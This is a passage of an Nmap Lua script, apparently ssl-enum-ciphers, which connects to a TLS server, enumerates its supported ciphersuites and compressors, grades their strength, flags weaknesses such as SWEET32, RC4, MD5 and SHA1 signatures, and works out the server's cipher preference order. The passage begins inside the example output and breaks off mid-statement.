TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (secp256r1) - C\n-- | TLS_ECDHE_RSA_WITH_RC4_128_SHA (secp256r1) - C\n-- | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C\n-- | TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C\n-- | compressors:\n-- | NULL\n-- | cipher preference: server\n-- | warnings:\n-- | 64-bit block cipher 3DES vulnerable to SWEET32 attack\n-- | Broken cipher RC4 is deprecated by RFC 7465\n-- | Ciphersuite uses MD5 for message integrity\n-- | Weak certificate signature: SHA1\n-- | TLSv1.2:\n-- | ciphers:\n-- | TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A\n-- | TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A\n-- | TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n-- | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A\n-- | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A\n-- | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n-- | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n-- | TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n-- | TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n-- | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n-- | TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (secp256r1) - C\n-- | TLS_ECDHE_RSA_WITH_RC4_128_SHA (secp256r1) - C\n-- | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C\n-- | TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C\n-- | compressors:\n-- | NULL\n-- | cipher preference: server\n-- | warnings:\n-- | 64-bit block cipher 3DES vulnerable to SWEET32 attack\n-- | Broken cipher RC4 is deprecated by RFC 7465\n-- | Ciphersuite uses MD5 for message integrity\n-- |_ least strength: C\n--\n-- @xmloutput\n-- <table key=\"TLSv1.0\">\n-- <table key=\"ciphers\">\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_RC4_128_MD5</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- </table>\n-- <table key=\"compressors\">\n-- <elem>NULL</elem>\n-- </table>\n-- <elem key=\"cipher preference\">server</elem>\n-- <table key=\"warnings\">\n-- <elem>64-bit block cipher 3DES vulnerable to SWEET32 attack</elem>\n-- <elem>Broken cipher RC4 is deprecated by RFC 7465</elem>\n-- <elem>Ciphersuite uses MD5 for message integrity</elem>\n-- <elem>Weak certificate signature: SHA1</elem>\n-- </table>\n-- </table>\n-- <table key=\"TLSv1.2\">\n-- <table key=\"ciphers\">\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">\n-- TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">\n-- TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_128_GCM_SHA256</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_256_GCM_SHA384</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_128_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_AES_256_CBC_SHA</elem>\n-- <elem key=\"strength\">A</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_3DES_EDE_CBC_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_ECDSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">secp256r1</elem>\n-- <elem key=\"name\">TLS_ECDHE_RSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_RC4_128_SHA</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- <table>\n-- <elem key=\"kex_info\">rsa 2048</elem>\n-- <elem key=\"name\">TLS_RSA_WITH_RC4_128_MD5</elem>\n-- <elem key=\"strength\">C</elem>\n-- </table>\n-- </table>\n-- <table key=\"compressors\">\n-- <elem>NULL</elem>\n-- </table>\n-- <elem key=\"cipher preference\">server</elem>\n-- <table key=\"warnings\">\n-- <elem>64-bit block cipher 3DES vulnerable to SWEET32 attack</elem>\n-- <elem>Broken cipher RC4 is deprecated by RFC 7465</elem>\n-- <elem>Ciphersuite uses MD5 for message integrity</elem>\n-- </table>\n-- </table>\n-- <elem key=\"least strength\">C</elem>\n\nauthor = {\"Mak Kolybabi <mak@kolybabi.com>\", \"Gabriel Lawrence\"}\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"intrusive\"}\ndependencies = {\"https-redirect\"}\n\n-- Test at most this many ciphersuites at a time.\n-- http://seclists.org/nmap-dev/2012/q3/156\n-- http://seclists.org/nmap-dev/2010/q1/859\nlocal CHUNK_SIZE = 64\nlocal have_ssl, openssl = pcall(require,'openssl')\n\n-- Add additional context (protocol) to debug output\nlocal function ctx_log(level, protocol, fmt, ...)\n return stdnse.debug(level, \"(%s) \" .. fmt, protocol, ...)\nend\n\n-- returns a function that yields a new tls record each time it is called\nlocal function get_record_iter(sock)\n local buffer = \"\"\n local i = 1\n local fragment\n return function ()\n local record\n i, record = tls.record_read(buffer, i, fragment)\n if record == nil then\n local status, err\n status, buffer, err = tls.record_buffer(sock, buffer, i)\n if not status then\n return nil, err\n end\n i, record = tls.record_read(buffer, i, fragment)\n if record == nil then\n return nil, \"done\"\n end\n end\n fragment = record.fragment\n return record\n end\nend\n\nlocal function try_params(host, port, t)\n\n -- Use Nmap's own discovered timeout plus 5 seconds for host processing\n -- Default to 10 seconds total.\n local timeout = ((host.times and host.times.timeout) or 5) * 1000 + 5000\n\n -- Create socket.\n local status, sock, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, sock = specialized(host, port)\n if not status then\n ctx_log(1, t.protocol, \"Can't connect: %s\", sock)\n return nil\n end\n else\n sock = nmap.new_socket()\n sock:set_timeout(timeout)\n status, err = sock:connect(host, port)\n if not status then\n ctx_log(1, t.protocol, \"Can't connect: %s\", err)\n sock:close()\n return nil\n end\n end\n\n sock:set_timeout(timeout)\n\n -- Send request.\n local req = tls.client_hello(t)\n status, err = sock:send(req)\n if not status then\n ctx_log(1, t.protocol, \"Can't send: %s\", err)\n sock:close()\n return nil\n end\n\n -- Read response.\n local get_next_record = get_record_iter(sock)\n local records = {}\n while true do\n local record\n record, err = get_next_record()\n if not record then\n ctx_log(1, t.protocol, \"Couldn't read a TLS record: %s\", err)\n sock:close()\n return records\n end\n -- Collect message bodies into one record per type\n records[record.type] = records[record.type] or record\n local done = false\n for j = 1, #record.body do -- no ipairs because we append below\n local b = record.body[j]\n done = ((record.type == \"alert\" and b.level == \"fatal\") or\n (record.type == \"handshake\" and b.type == \"server_hello_done\"))\n table.insert(records[record.type].body, b)\n end\n if done then\n sock:close()\n return records\n end\n end\nend\n\nlocal function sorted_keys(t)\n local ret = {}\n for k, _ in pairs(t) do\n ret[#ret+1] = k\n end\n table.sort(ret)\n return ret\nend\n\nlocal function in_chunks(t, size)\n size = math.floor(size)\n if size < 1 then size = 1 end\n local ret = {}\n for i = 1, #t, size do\n local chunk = {}\n for j = i, i + size - 1 do\n chunk[#chunk+1] = t[j]\n end\n ret[#ret+1] = chunk\n end\n return ret\nend\n\nlocal function remove(t, e)\n for i, v in ipairs(t) do\n if v == e then\n table.remove(t, i)\n return i\n end\n end\n return nil\nend\n\nlocal function slice(t, i, j)\n local output = {}\n while i <= j do\n output[#output+1] = t[i]\n i = i + 1\n end\n return output\nend\n\nlocal function merge(a, b, cmp)\n local output = {}\n local i = 1\n local j = 1\n while i <= #a and j <= #b do\n local winner, err = cmp(a[i], b[j])\n if not winner then\n return nil, err\n end\n if winner == a[i] then\n output[#output+1] = a[i]\n i = i + 1\n else\n output[#output+1] = b[j]\n j = j + 1\n end\n end\n while i <= #a do\n output[#output+1] = a[i]\n i = i + 1\n end\n while j <= #b do\n output[#output+1] = b[j]\n j = j + 1\n end\n return output\nend\n\nlocal function merge_recursive(chunks, cmp)\n if #chunks == 0 then\n return {}\n elseif #chunks == 1 then\n return chunks[1]\n else\n local m = math.floor(#chunks / 2)\n local a, b = slice(chunks, 1, m), slice(chunks, m+1, #chunks)\n local am, err = merge_recursive(a, cmp)\n if not am then\n return nil, err\n end\n local bm, err = merge_recursive(b, cmp)\n if not bm then\n return nil, err\n end\n return merge(am, bm, cmp)\n end\nend\n\n-- https://bugzilla.mozilla.org/show_bug.cgi?id=946147\nlocal function remove_high_byte_ciphers(t)\n local output = {}\n for i, v in ipairs(t) do\n if tls.CIPHERS[v] <= 255 then\n output[#output+1] = v\n end\n end\n return output\nend\n\n-- Get TLS extensions\nlocal function base_extensions(host)\n local tlsname = tls.servername(host)\n return {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n -- Enable SNI if a server name is available\n [\"server_name\"] = tlsname and tls.EXTENSION_HELPERS[\"server_name\"](tlsname),\n }\nend\n\n-- Get a message body from a record which has the specified property set to value\nlocal function get_body(record, property, value)\n for i, b in ipairs(record.body) do\n if b[property] == value then\n return b\n end\n end\n return nil\nend\n\n-- Score a ciphersuite implementation (including key exchange info)\nlocal function score_cipher (kex_strength, cipher_info)\n local kex_score, cipher_score\n if not kex_strength or not cipher_info.size then\n return \"unknown\"\n end\n if kex_strength == 0 then\n return 0\n elseif kex_strength < 512 then\n kex_score = 0.2\n elseif kex_strength < 1024 then\n kex_score = 0.4\n elseif kex_strength < 2048 then\n kex_score = 0.8\n elseif kex_strength < 4096 then\n kex_score = 0.9\n else\n kex_score = 1.0\n end\n\n if cipher_info.size == 0 then\n return 0\n elseif cipher_info.size < 128 then\n cipher_score = 0.2\n elseif cipher_info.size < 256 then\n cipher_score = 0.8\n else\n cipher_score = 1.0\n end\n\n -- Based on SSL Labs' 30-30-40 rating without the first 30% (protocol support)\n return 0.43 * kex_score + 0.57 * cipher_score\nend\n\nlocal function letter_grade (score)\n if not tonumber(score) then return \"unknown\" end\n if score >= 0.80 then\n return \"A\"\n elseif score >= 0.65 then\n return \"B\"\n elseif score >= 0.50 then\n return \"C\"\n elseif score >= 0.35 then\n return \"D\"\n elseif score >= 0.20 then\n return \"E\"\n else\n return \"F\"\n end\nend\n\n-- Find which ciphers out of group are supported by the server.\nlocal function find_ciphers_group(host, port, protocol, group, scores)\n local results = {}\n local t = {\n [\"protocol\"] = protocol,\n [\"record_protocol\"] = protocol, -- improve chances of immediate rejection\n [\"extensions\"] = base_extensions(host),\n }\n\n -- This is a hacky sort of tristate variable. There are three conditions:\n -- 1. false = either ciphers or protocol is bad. Keep trying with new ciphers\n -- 2. nil = The protocol is bad. Abandon thread.\n -- 3. true = Protocol works, at least some cipher must be supported.\n local protocol_worked = false\n while (next(group)) do\n t[\"ciphers\"] = group\n\n local records = try_params(host, port, t)\n if not records then\n return nil\n end\n local handshake = records.handshake\n\n if handshake == nil then\n local alert = records.alert\n if alert then\n ctx_log(2, protocol, \"Got alert: %s\", alert.body[1].description)\n if alert[\"protocol\"] ~= protocol then\n ctx_log(1, protocol, \"Protocol mismatch (received %s)\", alert.protocol)\n -- Sometimes this is not an actual rejection of the protocol. Check specifically:\n if get_body(alert, \"description\", \"protocol_version\") then\n protocol_worked = nil\n end\n break\n elseif get_body(alert, \"description\", \"handshake_failure\") then\n protocol_worked = true\n ctx_log(2, protocol, \"%d ciphers rejected.\", #group)\n break\n end\n elseif protocol_worked then\n ctx_log(2, protocol, \"%d ciphers rejected. (No handshake)\", #group)\n else\n ctx_log(1, protocol, \"%d ciphers and/or protocol rejected. (No handshake)\", #group)\n end\n break\n else\n local server_hello = get_body(handshake, \"type\", \"server_hello\")\n if not server_hello then\n ctx_log(2, protocol, \"Unexpected record received.\")\n break\n end\n if server_hello.protocol ~= protocol then\n ctx_log(1, protocol, \"Protocol rejected. cipher: %s\", server_hello.cipher)\n -- Some implementations will do this if a cipher is supported in some\n -- other protocol version but not this one. Gotta keep trying.\n if not remove(group, server_hello.cipher) then\n -- But if we didn't even offer this cipher, then give up. Crazy!\n protocol_worked = protocol_worked or nil\n end\n break\n else\n protocol_worked = true\n local name = server_hello.cipher\n ctx_log(2, protocol, \"Cipher %s chosen.\", name)\n if not remove(group, name) then\n ctx_log(1, protocol, \"chose cipher %s that was not offered.\", name)\n ctx_log(1, protocol, \"removing high-byte ciphers and trying again.\")\n local size_before = #group\n group = remove_high_byte_ciphers(group)\n ctx_log(1, protocol, \"removed %d high-byte ciphers.\", size_before - #group)\n if #group == size_before then\n -- No changes... Server just doesn't like our offered ciphers.\n break\n end\n else\n -- Add cipher to the list of accepted ciphers.\n table.insert(results, name)\n if scores then\n local info = tls.cipher_info(name)\n -- Some warnings:\n if info.hash and info.hash == \"MD5\" then\n scores.warnings[\"Ciphersuite uses MD5 for message integrity\"] = true\n end\n if info.mode and info.mode == \"CBC\" and info.block_size <= 64 then\n scores.warnings[(\"64-bit block cipher %s vulnerable to SWEET32 attack\"):format(info.cipher)] = true\n end\n if protocol == \"SSLv3\" and info.mode and info.mode == \"CBC\" then\n scores.warnings[\"CBC-mode cipher in SSLv3 (CVE-2014-3566)\"] = true\n elseif info.cipher == \"RC4\" then\n scores.warnings[\"Broken cipher RC4 is deprecated by RFC 7465\"] = true\n end\n local kex = tls.KEX_ALGORITHMS[info.kex]\n scores.any_pfs_ciphers = kex.pfs or scores.any_pfs_ciphers\n local extra, kex_strength\n if kex.anon then\n kex_strength = 0\n elseif kex.export then\n if info.kex:find(\"1024$\") then\n kex_strength = 1024\n else\n kex_strength = 512\n end\n else\n if have_ssl and kex.pubkey then\n local certs = get_body(handshake, \"type\", \"certificate\")\n -- Assume RFC compliance:\n -- \"The sender's certificate MUST come first in the list.\"\n -- This may not always be the case, so\n -- TODO: reorder certificates and validate entire chain\n -- TODO: certificate validation (date, self-signed, etc)\n local c, err\n if certs == nil then\n err = \"no certificate message\"\n else\n c, err = sslcert.parse_ssl_certificate(certs.certificates[1])\n end\n if not c then\n stdnse.debug1(\"Failed to parse certificate: %s\", err)\n elseif c.pubkey.type == kex.pubkey then\n local sigalg = c.sig_algorithm:match(\"([mM][dD][245])\")\n if sigalg then\n -- MD2 and MD5 are broken\n kex_strength = 0\n scores.warnings[\"Insecure certificate signature: \" .. string.upper(sigalg)] = true\n else\n sigalg = c.sig_algorithm:match(\"([sS][hH][aA]1)\")\n if sigalg then\n -- TODO: Update this when SHA-1 is fully deprecated in 2017\n if type(c.notBefore) == \"table\" and c.notBefore.year >= 2016 then\n kex_strength = 0\n scores.warnings[\"Deprecated SHA1 signature in certificate issued after January 1, 2016\"] = true\n end\n scores.warnings[\"Weak certificate signature: SHA1\"] = true\n end\n kex_strength = tls.rsa_equiv(kex.pubkey, c.pubkey.bits)\n if c.pubkey.exponent then\n if openssl.bignum_bn2dec(c.pubkey.exponent) == \"1\" then\n kex_strength = 0\n scores.warnings[\"Certificate RSA exponent is 1, score capped at F\"] = true\n end\n end\n if c.pubkey.ecdhparams then\n if c.pubkey.ecdhparams.curve_params.ec_curve_type == \"namedcurve\" then\n extra = c.pubkey.ecdhparams.curve_params.curve\n else\n extra = string.format(\"%s %d\", c.pubkey.ecdhparams.curve_params.ec_curve_type, c.pubkey.bits)\n end\n else\n extra = string.format(\"%s %d\", kex.pubkey, c.pubkey.bits)\n end\n end\n end\n end\n local ske = get_body(handshake, \"type\", \"server_key_exchange\")\n if kex.server_key_exchange and ske then\n local kex_info = kex.server_key_exchange(ske.data, protocol)\n if kex_info.strength then\n local rsa_bits = tls.rsa_equiv(kex.type, kex_info.strength)\n local low_strength_warning = false\n if kex_strength and kex_strength > rsa_bits then\n kex_strength = rsa_bits\n low_strength_warning = true\n end\n kex_strength = kex_strength or rsa_bits\n if kex_info.ecdhparams then\n if kex_info.ecdhparams.curve_params.ec_curve_type == \"namedcurve\" then\n extra = kex_info.ecdhparams.curve_params.curve\n else\n extra = string.format(\"%s %d\", kex_info.ecdhparams.curve_params.ec_curve_type, kex_info.strength)\n end\n else\n extra = string.format(\"%s %d\", kex.type, kex_info.strength)\n end\n if low_strength_warning then\n scores.warnings[(\n \"Key exchange (%s) of lower strength than certificate key\"\n ):format(extra)] = true\n end\n end\n if kex_info.rsa and kex_info.rsa.exponent == 1 then\n kex_strength = 0\n scores.warnings[\"Certificate RSA exponent is 1, score capped at F\"] = true\n end\n end\n end\n scores[name] = {\n cipher_strength=info.size,\n kex_strength = kex_strength,\n extra = extra,\n letter_grade = letter_grade(score_cipher(kex_strength, info))\n }\n end\n end\n end\n end\n end\n return results, protocol_worked\nend\n\nlocal function get_chunk_size(host, protocol)\n -- Try to make sure we don't send too big of a handshake\n -- https://github.com/ssllabs/research/wiki/Long-Handshake-Intolerance\n local len_t = {\n protocol = protocol,\n ciphers = {},\n extensions = base_extensions(host),\n }\n local cipher_len_remaining = 255 - #tls.client_hello(len_t)\n -- if we're over 255 anyway, just go for it.\n -- Each cipher adds 2 bytes\n local max_chunks = cipher_len_remaining > 1 and cipher_len_remaining // 2 or CHUNK_SIZE\n -- otherwise, use the min\n return max_chunks < CHUNK_SIZE and max_chunks or CHUNK_SIZE\nend\n\n-- Break the cipher list into chunks of CHUNK_SIZE (for servers that can't\n-- handle many client ciphers at once), and then call find_ciphers_group on\n-- each chunk.\nlocal function find_ciphers(host, port, protocol)\n\n local ciphers = in_chunks(sorted_keys(tls.CIPHERS), get_chunk_size(host, protocol))\n\n local results = {}\n local scores = {warnings={}}\n -- Try every cipher.\n for _, group in ipairs(ciphers) do\n local chunk, protocol_worked = find_ciphers_group(host, port, protocol, group, scores)\n if protocol_worked == nil then return nil end\n for _, name in ipairs(chunk) do\n table.insert(results, name)\n end\n end\n if not next(results) then return nil end\n scores.warnings[\"Forward Secrecy not supported by any cipher\"] = (not scores.any_pfs_ciphers) or nil\n scores.any_pfs_ciphers = nil\n\n return results, scores\nend\n\nlocal function find_compressors(host, port, protocol, good_ciphers)\n local compressors = sorted_keys(tls.COMPRESSORS)\n local t = {\n [\"protocol\"] = protocol,\n [\"ciphers\"] = good_ciphers,\n [\"extensions\"] = base_extensions(host),\n }\n\n local results = {}\n\n -- Try every compressor.\n local protocol_worked = false\n while (next(compressors)) do\n -- Create structure.\n t[\"compressors\"] = compressors\n\n -- Try connecting with compressor.\n local records = try_params(host, port, t)\n local handshake = records.handshake\n\n if handshake == nil then\n local alert = records.alert\n if alert then\n ctx_log(2, protocol, \"Got alert: %s\", alert.body[1].description)\n if alert[\"protocol\"] ~= protocol then\n ctx_log(1, protocol, \"Protocol rejected.\")\n protocol_worked = nil\n break\n elseif get_body(alert, \"description\", \"handshake_failure\") then\n protocol_worked = true\n ctx_log(2, protocol, \"%d compressors rejected.\", #compressors)\n -- Should never get here, because NULL should be good enough.\n -- The server may just not be able to handle multiple compressors.\n if #compressors > 1 then -- Make extra-sure it's not crazily rejecting the NULL compressor\n compressors[1] = \"NULL\"\n for i = 2, #compressors, 1 do\n compressors[i] = nil\n end\n -- try again.\n else\n break\n end\n end\n elseif protocol_worked then\n ctx_log(2, protocol, \"%d compressors rejected. (No handshake)\", #compressors)\n else\n ctx_log(1, protocol, \"%d compressors and/or protocol rejected. (No handshake)\", #compressors)\n end\n break\n else\n local server_hello = get_body(handshake, \"type\", \"server_hello\")\n if not server_hello then\n ctx_log(2, protocol, \"Unexpected record received.\")\n break\n end\n if server_hello.protocol ~= protocol then\n ctx_log(1, protocol, \"Protocol rejected.\")\n protocol_worked = (protocol_worked == nil) and nil or false\n break\n else\n protocol_worked = true\n local name = server_hello.compressor\n ctx_log(2, protocol, \"Compressor %s chosen.\", name)\n remove(compressors, name)\n\n -- Add compressor to the list of accepted compressors.\n table.insert(results, name)\n if name == \"NULL\" then\n break -- NULL is always last choice, and must be included\n end\n end\n end\n end\n\n return results\nend\n\n-- Offer two ciphers and return the one chosen by the server. Returns nil and\n-- an error message in case of a server error.\nlocal function compare_ciphers(host, port, protocol, cipher_a, cipher_b)\n local t = {\n [\"protocol\"] = protocol,\n [\"ciphers\"] = {cipher_a, cipher_b},\n [\"extensions\"] = base_extensions(host),\n }\n local records = try_params(host, port, t)\n local server_hello = records.handshake and get_body(records.handshake, \"type\", \"server_hello\")\n if server_hello then\n ctx_log(2, protocol, \"compare %s %s -> %s\", cipher_a, cipher_b, server_hello.cipher)\n return server_hello.cipher\n else\n ctx_log(2, protocol, \"compare %s %s -> error\", cipher_a, cipher_b)\n return nil, string.format(\"Error when comparing %s and %s\", cipher_a, cipher_b)\n end\nend\n\n-- Try to find whether the server prefers its own ciphersuite order or that of\n-- the client.\n--\n-- The return value is (preference, err). preference is a string:\n-- \"server\": the server prefers its own order. In this case ciphers is non-nil.\n-- \"client\": the server follows the client preference. ciphers is nil.\n-- \"indeterminate\": returned when there are only 0 or 1 ciphers. ciphers is nil.\n-- nil: an error occurred during the test. err is non-nil.\n-- err is an error message string that is non-nil when preference is nil or\n-- indeterminate.\n--\n-- The algorithm tries offering two ciphersuites in two different orders. If\n-- the server makes a different choice each time, \"client\" preference is\n-- assumed. Otherwise, \"server\" preference is assumed.\nlocal function find_cipher_preference(host, port, protocol, ciphers)\n -- Too few ciphers to make a decision?\n if #ciphers < 2 then\n return \"indeterminate\", \"Too few ciphers supported\"\n end\n\n -- Do a comparison in both directions to see if server ordering is consistent.\n local cipher_a, cipher_b = ciphers[1], ciphers[2]\n ctx_log(1, protocol, \"Comparing %s to %s\", cipher_a, cipher_b)\n local winner_forwards, err = compare_ciphers(host, port, protocol, cipher_a, cipher_b)\n if not winner_forwards then\n return nil, err\n end\n local winner_backward, err = compare_ciphers(host, port, protocol, cipher_b, cipher_a)\n if not winner_backward then\n return nil, err\n end\n if winner_forwards ~= winner_backward then\n return \"client\", nil\n end\n return \"server\", nil\nend\n\n-- Sort ciphers according to server preference with a modified merge sort\nlocal function sort_ciphers(host, port, protocol, ciphers)\n local chunks = {}\n for _, group in ipairs(in_chunks(ciphers, get_chunk_size(host, protocol))) do\n local size = #group\n local chunk = find_ciphers_group(host, port, protocol, group)\n if not chunk then\n return nil, \"Network error\"\n end\n if #chunk ~= size then\n ctx_log(1, protocol, \"warning: %d ciphers offered but only %d accepted\", size, #chunk)\n end\n table.insert(chunks, chunk)\n end\n\n -- The comparison operator for the merge is a 2-cipher ClientHello.\n local function cmp(cipher_a, cipher_b)\n return compare_ciphers(host, port, protocol, cipher_a, cipher_b)\n end\n local sorted, err = merge_recursive(chunks, cmp)\n if not sorted then\n return nil, err\n end\n return sorted\nend\n\nlocal function try_protocol(host, port, protocol, upresults)\n local condvar = nmap.condvar(upresults)\n\n local results = stdnse.output_table()\n\n -- Find all valid ciphers.\n local ciphers, scores = find_ciphers(host, port, protocol)\n if ciphers == nil then\n condvar \"signal\"\n return nil\n end\n\n if #ciphers == 0 then\n results = {ciphers={},compressors={}}\n setmetatable(results,{\n __tostring=function(t) return \"No supported ciphers found\" end\n })\n upresults[protocol] = results\n condvar \"signal\"\n return nil\n end\n -- Find all valid compression methods.\n local compressors\n -- Reduce chunk size by 1 to allow extra room for the extra compressors (2 bytes)\n for _, c in ipairs(in_chunks(ciphers, get_chunk_size(host, protocol) - 1)) do\n compressors = find_compressors(host, port, protocol, c)\n -- I observed a weird interaction between ECDSA ciphers and DEFLATE compression.\n -- Some servers would reject the handshake if no non-ECDSA ciphers were available.\n -- Sending 64 ciphers at a time should be sufficient, but we'll try them all if necessary.\n if compressors and #compressors ~= 0 then\n break\n end\n end\n\n -- Note the server's cipher preference algorithm.\n local cipher_pref, cipher_pref_err = find_cipher_preference(host, port, protocol, ciphers)\n\n -- Order ciphers according to server preference, if possible\n if cipher_pref == 